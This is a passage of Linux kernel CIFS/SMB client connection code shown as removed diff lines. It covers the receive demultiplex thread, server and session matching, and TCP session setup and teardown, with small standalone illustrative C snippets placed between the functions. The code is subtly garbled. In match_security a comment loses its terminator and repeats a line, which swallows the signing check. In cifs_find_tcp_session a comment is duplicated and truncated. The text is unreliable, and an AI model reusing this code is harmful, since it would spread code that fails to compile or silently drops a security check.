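 * A toy model of the SMB2 credit flow that smb2_add_credits_from_hdr()
 * above takes part in: each send consumes a credit, each response header
 * can grant credits back via CreditRequest, and senders blocked on an
 * empty pool get woken when it refills. Locking, tracing, and the actual
 * wait queue are elided; names are illustrative.
 */
struct credit_pool {
	int credits;	/* requests we may still put on the wire */
	int in_flight;	/* requests currently awaiting a response */
};

int credit_take(struct credit_pool *p)
{
	if (p->credits <= 0)
		return -1;	/* the real caller sleeps on request_q */
	p->credits--;
	p->in_flight++;
	return 0;
}

void credit_grant(struct credit_pool *p, unsigned short granted)
{
	p->in_flight--;
	p->credits += granted;	/* the real code then wakes request_q */
}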
+-
+-static int
+-cifs_demultiplex_thread(void *p)
+-{
+-	int i, num_mids, length;
+-	struct TCP_Server_Info *server = p;
+-	unsigned int pdu_length;
+-	unsigned int next_offset;
+-	char *buf = NULL;
+-	struct task_struct *task_to_wake = NULL;
+-	struct mid_q_entry *mids[MAX_COMPOUND];
+-	char *bufs[MAX_COMPOUND];
+-	unsigned int noreclaim_flag, num_io_timeout = 0;
+-
+-	noreclaim_flag = memalloc_noreclaim_save();
+-	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
+-
+-	length = atomic_inc_return(&tcpSesAllocCount);
+-	if (length > 1)
+-		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
+-
+-	set_freezable();
+-	allow_kernel_signal(SIGKILL);
+-	while (server->tcpStatus != CifsExiting) {
+-		if (try_to_freeze())
+-			continue;
+-
+-		if (!allocate_buffers(server))
+-			continue;
+-
+-		server->large_buf = false;
+-		buf = server->smallbuf;
+-		pdu_length = 4; /* enough to get RFC1001 header */
+-
+-		length = cifs_read_from_socket(server, buf, pdu_length);
+-		if (length < 0)
+-			continue;
+-
+-		if (is_smb1(server))
+-			server->total_read = length;
+-		else
+-			server->total_read = 0;
+-
+-		/*
+-		 * The right amount (4 bytes) was read from the socket, so we
+-		 * can now interpret the length field.
+-		 */
+-		pdu_length = get_rfc1002_length(buf);
+-
+-		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
+-		if (!is_smb_response(server, buf[0]))
+-			continue;
+-next_pdu:
+-		server->pdu_size = pdu_length;
+-
+-		/* make sure we have enough to get to the MID */
+-		if (server->pdu_size < MID_HEADER_SIZE(server)) {
+-			cifs_server_dbg(VFS, "SMB response too short (%u bytes)\n",
+-				 server->pdu_size);
+-			cifs_reconnect(server, true);
+-			continue;
+-		}
+-
+-		/* read down to the MID */
+-		length = cifs_read_from_socket(server,
+-			     buf + HEADER_PREAMBLE_SIZE(server),
+-			     MID_HEADER_SIZE(server));
+-		if (length < 0)
+-			continue;
+-		server->total_read += length;
+-
+-		if (server->ops->next_header) {
+-			next_offset = server->ops->next_header(buf);
+-			if (next_offset)
+-				server->pdu_size = next_offset;
+-		}
+-
+-		memset(mids, 0, sizeof(mids));
+-		memset(bufs, 0, sizeof(bufs));
+-		num_mids = 0;
+-
+-		if (server->ops->is_transform_hdr &&
+-		    server->ops->receive_transform &&
+-		    server->ops->is_transform_hdr(buf)) {
+-			length = server->ops->receive_transform(server,
+-								mids,
+-								bufs,
+-								&num_mids);
+-		} else {
+-			mids[0] = server->ops->find_mid(server, buf);
+-			bufs[0] = buf;
+-			num_mids = 1;
+-
+-			if (!mids[0] || !mids[0]->receive)
+-				length = standard_receive3(server, mids[0]);
+-			else
+-				length = mids[0]->receive(server, mids[0]);
+-		}
+-
+-		if (length < 0) {
+-			for (i = 0; i < num_mids; i++)
+-				if (mids[i])
+-					release_mid(mids[i]);
+-			continue;
+-		}
+-
+-		if (server->ops->is_status_io_timeout &&
+-		    server->ops->is_status_io_timeout(buf)) {
+-			num_io_timeout++;
+-			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
+-				cifs_reconnect(server, false);
+-				num_io_timeout = 0;
+-				continue;
+-			}
+-		}
+-
+-		server->lstrp = jiffies;
+-
+-		for (i = 0; i < num_mids; i++) {
+-			if (mids[i] != NULL) {
+-				mids[i]->resp_buf_size = server->pdu_size;
+-
+-				if (bufs[i] && server->ops->is_network_name_deleted)
+-					server->ops->is_network_name_deleted(bufs[i],
+-									server);
+-
+-				if (!mids[i]->multiRsp || mids[i]->multiEnd)
+-					mids[i]->callback(mids[i]);
+-
+-				release_mid(mids[i]);
+-			} else if (server->ops->is_oplock_break &&
+-				   server->ops->is_oplock_break(bufs[i],
+-								server)) {
+-				smb2_add_credits_from_hdr(bufs[i], server);
+-				cifs_dbg(FYI, "Received oplock break\n");
+-			} else {
+-				cifs_server_dbg(VFS, "No task to wake, unknown frame received! NumMids %d\n",
+-						atomic_read(&mid_count));
+-				cifs_dump_mem("Received Data is: ", bufs[i],
+-					      HEADER_SIZE(server));
+-				smb2_add_credits_from_hdr(bufs[i], server);
+-#ifdef CONFIG_CIFS_DEBUG2
+-				if (server->ops->dump_detail)
+-					server->ops->dump_detail(bufs[i],
+-								 server);
+-				cifs_dump_mids(server);
+-#endif /* CIFS_DEBUG2 */
+-			}
+-		}
+-
+-		if (pdu_length > server->pdu_size) {
+-			if (!allocate_buffers(server))
+-				continue;
+-			pdu_length -= server->pdu_size;
+-			server->total_read = 0;
+-			server->large_buf = false;
+-			buf = server->smallbuf;
+-			goto next_pdu;
+-		}
+-	} /* end while !EXITING */
+-
+-	/* buffer usually freed in free_mid - need to free it here on exit */
+-	cifs_buf_release(server->bigbuf);
+-	if (server->smallbuf) /* no sense logging a debug message if NULL */
+-		cifs_small_buf_release(server->smallbuf);
+-
+-	task_to_wake = xchg(&server->tsk, NULL);
+-	clean_demultiplex_info(server);
+-
+-	/* if server->tsk was NULL then wait for a signal before exiting */
+-	if (!task_to_wake) {
+-		set_current_state(TASK_INTERRUPTIBLE);
+-		while (!signal_pending(current)) {
+-			schedule();
+-			set_current_state(TASK_INTERRUPTIBLE);
+-		}
+-		set_current_state(TASK_RUNNING);
+-	}
+-
+-	memalloc_noreclaim_restore(noreclaim_flag);
+-	module_put_and_kthread_exit(0);
+-}
+-
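/*
 * A sketch of the preamble handling in the receive loop above: the first
 * 4 bytes read from the socket form the RFC 1002 header, with a frame
 * type in byte 0 and a big-endian length in the remaining bytes, which is
 * what get_rfc1002_length() extracts. Illustrative, not the kernel helper.
 */
#include <stdint.h>

uint32_t rfc1002_length(const unsigned char buf[4])
{
	/* buf[0] is the frame type; the low 24 bits carry the PDU length */
	return ((uint32_t)buf[1] << 16) | ((uint32_t)buf[2] << 8) | buf[3];
}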
+-/*
+- * Returns true if srcaddr isn't specified and rhs isn't specified, or
+- * if srcaddr is specified and matches the IP address of the rhs argument
+- */
+-bool
+-cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs)
+-{
+-	switch (srcaddr->sa_family) {
+-	case AF_UNSPEC:
+-		return (rhs->sa_family == AF_UNSPEC);
+-	case AF_INET: {
+-		struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
+-		struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
+-		return (saddr4->sin_addr.s_addr == vaddr4->sin_addr.s_addr);
+-	}
+-	case AF_INET6: {
+-		struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
+-		struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
+-		return ipv6_addr_equal(&saddr6->sin6_addr, &vaddr6->sin6_addr);
+-	}
+-	default:
+-		WARN_ON(1);
+-		return false; /* don't expect to be here */
+-	}
+-}
+-
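/*
 * Hypothetical usage of the AF_INET comparison that cifs_match_ipaddr()
 * above performs: two sockaddr_in addresses match when their 32-bit
 * s_addr fields are equal. Standalone userspace demo, not kernel code.
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>

int main(void)
{
	struct sockaddr_in a = { .sin_family = AF_INET };
	struct sockaddr_in b = { .sin_family = AF_INET };

	inet_pton(AF_INET, "192.0.2.10", &a.sin_addr);
	inet_pton(AF_INET, "192.0.2.10", &b.sin_addr);
	printf("match: %d\n", a.sin_addr.s_addr == b.sin_addr.s_addr);
	return 0;
}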
+-/*
+- * If no port is specified in the addr structure, we try to match with port
+- * 445 and, if that fails, with port 139. It should be called only if the
+- * address families of server and addr are equal.
+- */
+-static bool
+-match_port(struct TCP_Server_Info *server, struct sockaddr *addr)
+-{
+-	__be16 port, *sport;
+-
+-	/* SMBDirect manages its own ports, don't match it here */
+-	if (server->rdma)
+-		return true;
+-
+-	switch (addr->sa_family) {
+-	case AF_INET:
+-		sport = &((struct sockaddr_in *) &server->dstaddr)->sin_port;
+-		port = ((struct sockaddr_in *) addr)->sin_port;
+-		break;
+-	case AF_INET6:
+-		sport = &((struct sockaddr_in6 *) &server->dstaddr)->sin6_port;
+-		port = ((struct sockaddr_in6 *) addr)->sin6_port;
+-		break;
+-	default:
+-		WARN_ON(1);
+-		return false;
+-	}
+-
+-	if (!port) {
+-		port = htons(CIFS_PORT);
+-		if (port == *sport)
+-			return true;
+-
+-		port = htons(RFC1001_PORT);
+-	}
+-
+-	return port == *sport;
+-}
+-
+-static bool
+-match_address(struct TCP_Server_Info *server, struct sockaddr *addr,
+-	      struct sockaddr *srcaddr)
+-{
+-	switch (addr->sa_family) {
+-	case AF_INET: {
+-		struct sockaddr_in *addr4 = (struct sockaddr_in *)addr;
+-		struct sockaddr_in *srv_addr4 =
+-					(struct sockaddr_in *)&server->dstaddr;
+-
+-		if (addr4->sin_addr.s_addr != srv_addr4->sin_addr.s_addr)
+-			return false;
+-		break;
+-	}
+-	case AF_INET6: {
+-		struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)addr;
+-		struct sockaddr_in6 *srv_addr6 =
+-					(struct sockaddr_in6 *)&server->dstaddr;
+-
+-		if (!ipv6_addr_equal(&addr6->sin6_addr,
+-				     &srv_addr6->sin6_addr))
+-			return false;
+-		if (addr6->sin6_scope_id != srv_addr6->sin6_scope_id)
+-			return false;
+-		break;
+-	}
+-	default:
+-		WARN_ON(1);
+-		return false; /* don't expect to be here */
+-	}
+-
+-	if (!cifs_match_ipaddr(srcaddr, (struct sockaddr *)&server->srcaddr))
+-		return false;
+-
+-	return true;
+-}
+-
+-static bool
+-match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	/*
+-	 * The select_sectype function should either return the ctx->sectype
+-	 * that was specified, or "Unspecified" if that sectype was not
+-	 * compatible with the given NEGOTIATE request.
+-	 */
+-	if (server->ops->select_sectype(server, ctx->sectype)
+-	     == Unspecified)
+-		return false;
+-
+-	/*
+-	 * Now check if signing mode is acceptable. No need to check
+-	 * global_secflags at this point since if MUST_SIGN is set then
+-	 * the server->sign had better be too.
+-	 * server->sign had better be set too.
+-	if (ctx->sign && !server->sign)
+-		return false;
+-
+-	return true;
+-}
+-
+-/* this function must be called with srv_lock held */
+-static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+-
+-	lockdep_assert_held(&server->srv_lock);
+-
+-	if (ctx->nosharesock)
+-		return 0;
+-
+-	/* this server does not share socket */
+-	if (server->nosharesock)
+-		return 0;
+-
+-	/* If multidialect negotiation, see if existing sessions match one */
+-	if (strcmp(ctx->vals->version_string, SMB3ANY_VERSION_STRING) == 0) {
+-		if (server->vals->protocol_id < SMB30_PROT_ID)
+-			return 0;
+-	} else if (strcmp(ctx->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		if (server->vals->protocol_id < SMB21_PROT_ID)
+-			return 0;
+-	} else if ((server->vals != ctx->vals) || (server->ops != ctx->ops))
+-		return 0;
+-
+-	if (!net_eq(cifs_net_ns(server), current->nsproxy->net_ns))
+-		return 0;
+-
+-	if (strcasecmp(server->hostname, ctx->server_hostname))
+-		return 0;
+-
+-	if (!match_address(server, addr,
+-			   (struct sockaddr *)&ctx->srcaddr))
+-		return 0;
+-
+-	if (!match_port(server, addr))
+-		return 0;
+-
+-	if (!match_security(server, ctx))
+-		return 0;
+-
+-	if (server->echo_interval != ctx->echo_interval * HZ)
+-		return 0;
+-
+-	if (server->rdma != ctx->rdma)
+-		return 0;
+-
+-	if (server->ignore_signature != ctx->ignore_signature)
+-		return 0;
+-
+-	if (server->min_offload != ctx->min_offload)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-struct TCP_Server_Info *
+-cifs_find_tcp_session(struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		/*
+-		 * DFS failover implementation in cifs_reconnect() requires unique tcp sessions for
+-		 * DFS connections to do failover properly, so avoid sharing them with regular
+-		 * shares or even links that may connect to same server but having completely
+-		 * shares or even links that may connect to the same server but have completely
+-		 */
+-		if (server->is_dfs_conn) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-#endif
+-		/*
+-		 * Skip ses channels since they're only handled in lower layers
+-		 * (e.g. cifs_send_recv).
+-		 */
+-		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		++server->srv_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		cifs_dbg(FYI, "Existing tcp session with server found\n");
+-		return server;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void
+-cifs_put_tcp_session(struct TCP_Server_Info *server, int from_reconnect)
+-{
+-	struct task_struct *task;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (--server->srv_count > 0) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-
+-	/* srv_count can never go negative */
+-	WARN_ON(server->srv_count < 0);
+-
+-	put_net(cifs_net_ns(server));
+-
+-	list_del_init(&server->tcp_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* For secondary channels, we pick up ref-count on the primary server */
+-	if (CIFS_SERVER_IS_CHAN(server))
+-		cifs_put_tcp_session(server->primary_server, from_reconnect);
+-
+-	cancel_delayed_work_sync(&server->echo);
+-	cancel_delayed_work_sync(&server->resolve);
+-
+-	if (from_reconnect)
+-		/*
+-		 * Avoid deadlock here: reconnect work calls
+-		 * cifs_put_tcp_session() at its end. Need to be sure
+-		 * that reconnect work does nothing with server pointer after
+-		 * that step.
+-		 */
+-		cancel_delayed_work(&server->reconnect);
+-	else
+-		cancel_delayed_work_sync(&server->reconnect);
+-
+-	spin_lock(&server->srv_lock);
+-	server->tcpStatus = CifsExiting;
+-	spin_unlock(&server->srv_lock);
+-
+-	cifs_crypto_secmech_release(server);
+-
+-	kfree_sensitive(server->session_key.response);
+-	server->session_key.response = NULL;
+-	server->session_key.len = 0;
+-	kfree(server->hostname);
+-	server->hostname = NULL;
+-
+-	task = xchg(&server->tsk, NULL);
+-	if (task)
+-		send_sig(SIGKILL, task, 1);
+-}
+-
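/*
 * The srv_count lifecycle above in miniature: cifs_find_tcp_session()
 * takes a reference under the global list lock, and the final
 * cifs_put_tcp_session() tears the connection down. The locking and
 * kernel types are dropped; names are illustrative.
 */
struct conn { int refcount; };

struct conn *conn_get(struct conn *c)
{
	c->refcount++;	/* under cifs_tcp_ses_lock in the real code */
	return c;
}

void conn_put(struct conn *c)
{
	if (--c->refcount > 0)
		return;
	/* last reference: unlink, cancel workers, signal cifsd, free */
}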
+-struct TCP_Server_Info *
+-cifs_get_tcp_session(struct smb3_fs_context *ctx,
+-		     struct TCP_Server_Info *primary_server)
+-{
+-	struct TCP_Server_Info *tcp_ses = NULL;
+-	int rc;
+-
+-	cifs_dbg(FYI, "UNC: %s\n", ctx->UNC);
+-
+-	/* see if we already have a matching tcp_ses */
+-	tcp_ses = cifs_find_tcp_session(ctx);
+-	if (tcp_ses)
+-		return tcp_ses;
+-
+-	tcp_ses = kzalloc(sizeof(struct TCP_Server_Info), GFP_KERNEL);
+-	if (!tcp_ses) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-
+-	tcp_ses->hostname = kstrdup(ctx->server_hostname, GFP_KERNEL);
+-	if (!tcp_ses->hostname) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-
+-	if (ctx->nosharesock)
+-		tcp_ses->nosharesock = true;
+-
+-	tcp_ses->ops = ctx->ops;
+-	tcp_ses->vals = ctx->vals;
+-	cifs_set_net_ns(tcp_ses, get_net(current->nsproxy->net_ns));
+-
+-	tcp_ses->conn_id = atomic_inc_return(&tcpSesNextId);
+-	tcp_ses->noblockcnt = ctx->rootfs;
+-	tcp_ses->noblocksnd = ctx->noblocksnd || ctx->rootfs;
+-	tcp_ses->noautotune = ctx->noautotune;
+-	tcp_ses->tcp_nodelay = ctx->sockopt_tcp_nodelay;
+-	tcp_ses->rdma = ctx->rdma;
+-	tcp_ses->in_flight = 0;
+-	tcp_ses->max_in_flight = 0;
+-	tcp_ses->credits = 1;
+-	if (primary_server) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		++primary_server->srv_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		tcp_ses->primary_server = primary_server;
+-	}
+-	init_waitqueue_head(&tcp_ses->response_q);
+-	init_waitqueue_head(&tcp_ses->request_q);
+-	INIT_LIST_HEAD(&tcp_ses->pending_mid_q);
+-	mutex_init(&tcp_ses->_srv_mutex);
+-	memcpy(tcp_ses->workstation_RFC1001_name,
+-		ctx->source_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+-	memcpy(tcp_ses->server_RFC1001_name,
+-		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+-	tcp_ses->session_estab = false;
+-	tcp_ses->sequence_number = 0;
+-	tcp_ses->reconnect_instance = 1;
+-	tcp_ses->lstrp = jiffies;
+-	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
+-	spin_lock_init(&tcp_ses->req_lock);
+-	spin_lock_init(&tcp_ses->srv_lock);
+-	spin_lock_init(&tcp_ses->mid_lock);
+-	INIT_LIST_HEAD(&tcp_ses->tcp_ses_list);
+-	INIT_LIST_HEAD(&tcp_ses->smb_ses_list);
+-	INIT_DELAYED_WORK(&tcp_ses->echo, cifs_echo_request);
+-	INIT_DELAYED_WORK(&tcp_ses->resolve, cifs_resolve_server);
+-	INIT_DELAYED_WORK(&tcp_ses->reconnect, smb2_reconnect_server);
+-	mutex_init(&tcp_ses->reconnect_mutex);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	mutex_init(&tcp_ses->refpath_lock);
+-#endif
+-	memcpy(&tcp_ses->srcaddr, &ctx->srcaddr,
+-	       sizeof(tcp_ses->srcaddr));
+-	memcpy(&tcp_ses->dstaddr, &ctx->dstaddr,
+-		sizeof(tcp_ses->dstaddr));
+-	if (ctx->use_client_guid)
+-		memcpy(tcp_ses->client_guid, ctx->client_guid,
+-		       SMB2_CLIENT_GUID_SIZE);
+-	else
+-		generate_random_uuid(tcp_ses->client_guid);
+-	/*
+-	 * at this point we are the only ones with a pointer to the
+-	 * struct since the kernel thread is not created yet, so there is
+-	 * no need to spinlock this init of tcpStatus or srv_count
+-	 */
+-	tcp_ses->tcpStatus = CifsNew;
+-	++tcp_ses->srv_count;
+-
+-	if (ctx->echo_interval >= SMB_ECHO_INTERVAL_MIN &&
+-		ctx->echo_interval <= SMB_ECHO_INTERVAL_MAX)
+-		tcp_ses->echo_interval = ctx->echo_interval * HZ;
+-	else
+-		tcp_ses->echo_interval = SMB_ECHO_INTERVAL_DEFAULT * HZ;
+-	if (tcp_ses->rdma) {
+-#ifndef CONFIG_CIFS_SMB_DIRECT
+-		cifs_dbg(VFS, "CONFIG_CIFS_SMB_DIRECT is not enabled\n");
+-		rc = -ENOENT;
+-		goto out_err_crypto_release;
+-#endif
+-		tcp_ses->smbd_conn = smbd_get_connection(
+-			tcp_ses, (struct sockaddr *)&ctx->dstaddr);
+-		if (tcp_ses->smbd_conn) {
+-			cifs_dbg(VFS, "RDMA transport established\n");
+-			rc = 0;
+-			goto smbd_connected;
+-		} else {
+-			rc = -ENOENT;
+-			goto out_err_crypto_release;
+-		}
+-	}
+-	rc = ip_connect(tcp_ses);
+-	if (rc < 0) {
+-		cifs_dbg(VFS, "Error connecting to socket. Aborting operation.\n");
+-		goto out_err_crypto_release;
+-	}
+-smbd_connected:
+-	/*
+-	 * since we're in a cifs function already, we know that
+-	 * this will succeed. No need for try_module_get().
+-	 */
+-	__module_get(THIS_MODULE);
+-	tcp_ses->tsk = kthread_run(cifs_demultiplex_thread,
+-				  tcp_ses, "cifsd");
+-	if (IS_ERR(tcp_ses->tsk)) {
+-		rc = PTR_ERR(tcp_ses->tsk);
+-		cifs_dbg(VFS, "error %d create cifsd thread\n", rc);
+-		module_put(THIS_MODULE);
+-		goto out_err_crypto_release;
+-	}
+-	tcp_ses->min_offload = ctx->min_offload;
+-	/*
+-	 * the demultiplex thread has been spawned by now, so take
+-	 * srv_lock before updating tcpStatus
+-	 */
+-	spin_lock(&tcp_ses->srv_lock);
+-	tcp_ses->tcpStatus = CifsNeedNegotiate;
+-	spin_unlock(&tcp_ses->srv_lock);
+-
+-	if ((ctx->max_credits < 20) || (ctx->max_credits > 60000))
+-		tcp_ses->max_credits = SMB2_MAX_CREDITS_AVAILABLE;
+-	else
+-		tcp_ses->max_credits = ctx->max_credits;
+-
+-	tcp_ses->nr_targets = 1;
+-	tcp_ses->ignore_signature = ctx->ignore_signature;
+-	/* thread spawned, put it on the list */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&tcp_ses->tcp_ses_list, &cifs_tcp_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* queue echo request delayed work */
+-	queue_delayed_work(cifsiod_wq, &tcp_ses->echo, tcp_ses->echo_interval);
+-
+-	/* queue dns resolution delayed work */
+-	cifs_dbg(FYI, "%s: next dns resolution scheduled for %d seconds in the future\n",
+-		 __func__, SMB_DNS_RESOLVE_INTERVAL_DEFAULT);
+-
+-	queue_delayed_work(cifsiod_wq, &tcp_ses->resolve, (SMB_DNS_RESOLVE_INTERVAL_DEFAULT * HZ));
+-
+-	return tcp_ses;
+-
+-out_err_crypto_release:
+-	cifs_crypto_secmech_release(tcp_ses);
+-
+-	put_net(cifs_net_ns(tcp_ses));
+-
+-out_err:
+-	if (tcp_ses) {
+-		if (CIFS_SERVER_IS_CHAN(tcp_ses))
+-			cifs_put_tcp_session(tcp_ses->primary_server, false);
+-		kfree(tcp_ses->hostname);
+-		if (tcp_ses->ssocket)
+-			sock_release(tcp_ses->ssocket);
+-		kfree(tcp_ses);
+-	}
+-	return ERR_PTR(rc);
+-}
+-
+-/* this function must be called with ses_lock and chan_lock held */
+-static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	if (ctx->sectype != Unspecified &&
+-	    ctx->sectype != ses->sectype)
+-		return 0;
+-
+-	/*
+-	 * If an existing session is limited to fewer channels than
+-	 * requested, it should not be reused
+-	 */
+-	if (ses->chan_max < ctx->max_channels)
+-		return 0;
+-
+-	switch (ses->sectype) {
+-	case Kerberos:
+-		if (!uid_eq(ctx->cred_uid, ses->cred_uid))
+-			return 0;
+-		break;
+-	default:
+-		/* NULL username means anonymous session */
+-		if (ses->user_name == NULL) {
+-			if (!ctx->nullauth)
+-				return 0;
+-			break;
+-		}
+-
+-		/* anything else takes username/password */
+-		if (strncmp(ses->user_name,
+-			    ctx->username ? ctx->username : "",
+-			    CIFS_MAX_USERNAME_LEN))
+-			return 0;
+-		if ((ctx->username && strlen(ctx->username) != 0) &&
+-		    ses->password != NULL &&
+-		    strncmp(ses->password,
+-			    ctx->password ? ctx->password : "",
+-			    CIFS_MAX_PASSWORD_LEN))
+-			return 0;
+-	}
+-	return 1;
+-}
+-
+-/**
+- * cifs_setup_ipc - helper to setup the IPC tcon for the session
+- * @ses: smb session to issue the request on
+- * @ctx: the superblock configuration context to use for building the
+- *       new tree connection for the IPC (interprocess communication RPC)
+- *
+- * A new IPC connection is made and stored in the session
+- * tcon_ipc. The IPC tcon has the same lifetime as the session.
+- */
+-static int
+-cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0, xid;
+-	struct cifs_tcon *tcon;
+-	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
+-	bool seal = false;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	/*
+-	 * If the mount request that resulted in the creation of the
+-	 * session requires encryption, force IPC to be encrypted too.
+-	 */
+-	if (ctx->seal) {
+-		if (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION)
+-			seal = true;
+-		else {
+-			cifs_server_dbg(VFS,
+-				 "IPC: server doesn't support encryption\n");
+-			return -EOPNOTSUPP;
+-		}
+-	}
+-
+-	tcon = tconInfoAlloc();
+-	if (tcon == NULL)
+-		return -ENOMEM;
+-
+-	spin_lock(&server->srv_lock);
+-	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
+-	spin_unlock(&server->srv_lock);
+-
+-	xid = get_xid();
+-	tcon->ses = ses;
+-	tcon->ipc = true;
+-	tcon->seal = seal;
+-	rc = server->ops->tree_connect(xid, ses, unc, tcon, ctx->local_nls);
+-	free_xid(xid);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "failed to connect to IPC (rc=%d)\n", rc);
+-		tconInfoFree(tcon);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
+-
+-	spin_lock(&tcon->tc_lock);
+-	tcon->status = TID_GOOD;
+-	spin_unlock(&tcon->tc_lock);
+-	ses->tcon_ipc = tcon;
+-out:
+-	return rc;
+-}
+-
+-/**
+- * cifs_free_ipc - helper to release the session IPC tcon
+- * @ses: smb session to unmount the IPC from
+- *
+- * Needs to be called every time a session is destroyed.
+- *
+- * On session close, the IPC is closed and the server must release all tcons of the session.
+- * No need to send a tree disconnect here.
+- *
+- * Besides, it will make the server not close durable and resilient files on session close, as
+- * specified in MS-SMB2 3.3.5.6 "Receiving an SMB2 LOGOFF Request".
+- */
+-static int
+-cifs_free_ipc(struct cifs_ses *ses)
+-{
+-	struct cifs_tcon *tcon = ses->tcon_ipc;
+-
+-	if (tcon == NULL)
+-		return 0;
+-
+-	tconInfoFree(tcon);
+-	ses->tcon_ipc = NULL;
+-	return 0;
+-}
+-
+-static struct cifs_ses *
+-cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	struct cifs_ses *ses;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_EXITING) {
+-			spin_unlock(&ses->ses_lock);
+-			continue;
+-		}
+-		spin_lock(&ses->chan_lock);
+-		if (!match_session(ses, ctx)) {
+-			spin_unlock(&ses->chan_lock);
+-			spin_unlock(&ses->ses_lock);
+-			continue;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-
+-		++ses->ses_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return ses;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void cifs_put_smb_ses(struct cifs_ses *ses)
+-{
+-	unsigned int rc, xid;
+-	unsigned int chan_count;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_EXITING) {
+-		spin_unlock(&ses->ses_lock);
+-		return;
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	cifs_dbg(FYI, "%s: ses_count=%d\n", __func__, ses->ses_count);
+-	cifs_dbg(FYI,
+-		 "%s: ses ipc: %s\n", __func__, ses->tcon_ipc ? ses->tcon_ipc->tree_name : "NONE");
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (--ses->ses_count > 0) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* ses_count can never go negative */
+-	WARN_ON(ses->ses_count < 0);
+-
+-	if (ses->ses_status == SES_GOOD)
+-		ses->ses_status = SES_EXITING;
+-
+-	cifs_free_ipc(ses);
+-
+-	if (ses->ses_status == SES_EXITING && server->ops->logoff) {
+-		xid = get_xid();
+-		rc = server->ops->logoff(xid, ses);
+-		if (rc)
+-			cifs_server_dbg(VFS, "%s: Session Logoff failure rc=%d\n",
+-				__func__, rc);
+-		_free_xid(xid);
+-	}
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_del_init(&ses->smb_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	chan_count = ses->chan_count;
+-
+-	/* close any extra channels */
+-	if (chan_count > 1) {
+-		int i;
+-
+-		for (i = 1; i < chan_count; i++) {
+-			if (ses->chans[i].iface) {
+-				kref_put(&ses->chans[i].iface->refcount, release_iface);
+-				ses->chans[i].iface = NULL;
+-			}
+-			cifs_put_tcp_session(ses->chans[i].server, 0);
+-			ses->chans[i].server = NULL;
+-		}
+-	}
+-
+-	sesInfoFree(ses);
+-	cifs_put_tcp_session(server, 0);
+-}
+-
+-#ifdef CONFIG_KEYS
+-
+-/* strlen("cifs:a:") + CIFS_MAX_DOMAINNAME_LEN + 1 */
+-#define CIFSCREDS_DESC_SIZE (7 + CIFS_MAX_DOMAINNAME_LEN + 1)
+-
